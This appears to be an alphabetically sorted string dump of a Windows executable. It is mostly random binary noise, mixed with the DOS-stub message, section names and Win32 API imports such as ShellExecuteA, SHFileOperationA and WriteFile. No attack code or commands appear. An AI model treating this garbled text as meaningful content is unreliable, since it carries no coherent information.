OOOOOOOOvvvvvvvvvvvvvvvvvvvTTTT
%Optd>u
\oZ.` 
//////////////////////p
P{/$ `
`@{p	6q
p8k5GS
\paa)~
P)BiXOX
pBYWPu
pJp	c;K
pp-----
ppEEEEb
PPPPPPP
ppZ&X#^
` PS&@ 
``q"@`
 Q0;N:
QCt}wsK
)QFylKYC+;
q>$  _p#
QPsIj?
qqqqqqqq
qqqqqqqqqqqqqqq
=QqUld
Q_q+Y:
 qtjtA
}qYdQ"
 `\QZ)G
<R(@`$
r&"a"~
raCvvD
R"`@bj
|RcPsm?!
`.rdata
ReadFile
.reloc
r%iM<\>A
RPCRT4.dll
rrrrrrrrrr
RRRRRRRRRRRRRRRRRRRRRRRRRR
{RuL'q
s20_jH].sH
. @S6g
S9)3\h0e>1K{
;|s#Bn
s#d.E0w
SetFilePointer
SetupComm
[SgYY:
SHBrowseForFolderA
SHELL32
ShellExecuteA
SHFileOperationA
SHGetFileInfoA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
"sjBdX!W~C
``Sprz
s|RZ@h
SSS:::
ssssss
ssssssss
SSSSSSSSS
``T[+^
T5[B3bOH
"	t=*8
@ t?)9
,  tAY
T;,  EU!3
!This program cannot be run in DOS mode.
,TI HNaT2;
 T$ `LZ
tt+:Pf
ttttHHH
TTTTTTTT
tttttttttt$$$$$$$$$$$$$$$
tttttttttttt								eeeMMMe
~Tz*`@
tzIF\H
@`'U;C
UM1h!1O"
UuidCreate
UUUUrrr
uuuuuu
UWg7I'ZX
u;Xlu1J
U|ZAs:9C>
v03W<.	
@`&  V`4
vAkE#*K}
Vds/@@
vE<#nM
VerQueryValueA
VERSION.dll
$`@@Vj
Vj%	?I
V@n;da
VqIwS;
=VRL:b
vv@@@@@@8888888888888888888888
vvv||||
VVVVVV
VVVVVVF
..[[vvvvvvv
vvvvvvvvv
$$$$$@@@w@@@@@@@
~~~~~W
\$/#Wa
WaitForSingleObject
WAQ2w0
WAxBrAh
WriteFile
WritePrivateProfileStringW
 ;^wRwK8
ws @ /
WWWWWW
WWWWWWW
wwwwwwwww
WWWWWWWWWWW
=_wZ[7
x6SAt&
&XCUQsY
X& `eJ}|
@ xe|XE
XJCMP$$
xK?BnSSRk
}xO(C 4;
(@`Xx!
xxxxxxx
XXXXXXX
xxxxxxxx
XXXXXXXXtt^^^^ $
XXXXXXXXXX
XXXXXXXXXXX
xxxxxxxyyy
xy<9K.@
YA ` X
ybez|#Q
yD;(` 
Ye:t|5
@$@`Yh
YH{ 2l
@#Yl1fo/%M,@`
y Sp,Yl
yXhKJV
yyy&&&
yyyyf555
yyyyyy
YYYYYYYYY
YYYYYYYYYY
y&Z{Mhr
)z0F2Ch
@^z1zr
z-l!7P
% ``zMG9
!ZpNEW
ZW2dA[=.
+Z)WNWzc
_____ZZZZZZZZZZZZZZZZZZZ